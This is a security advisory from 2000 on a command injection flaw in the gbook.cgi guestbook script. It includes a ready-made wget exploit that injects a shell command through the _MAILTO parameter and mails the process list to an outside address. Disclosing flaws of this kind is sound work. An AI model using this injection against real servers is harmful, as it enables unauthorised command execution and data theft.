[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : gbook.cgi remote command execution vulnerability

Title: gbook.cgi remote command execution vulnerability
Released by: Bill Kendrick
Date: 10th November 2000
Printable version: Click here
   Bug Report



1. Name: gbook.cgi remote command execution vulnerability

2. Release Date: 2000.11.10

3. Affected Application:

  GBook - A web site guestbook

     By Bill Kendrick

     kendrick@zippy.sonoma.edu

     http://zippy.sonoma.edu/kendrick/

4. Author: mat@hacksware.com

5. Type: Input validation Error



6. Explanation

 gbook.cgi is used by some web sites.

 We can set _MAILTO parameter, and popen is called to execute mail command.

 If ';' is used in _MAILTO variable, you can execute arbitrary command with it.

 It's so trivial. :)

7. Exploits

 This exploit executes "ps -ax" command and sends the result to haha@yaho.com.



 wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"





=================================================

|               mat@hacksware.com               |

|             http://hacksware.com              |

=================================================








(C) 1999-2000 All rights reserved.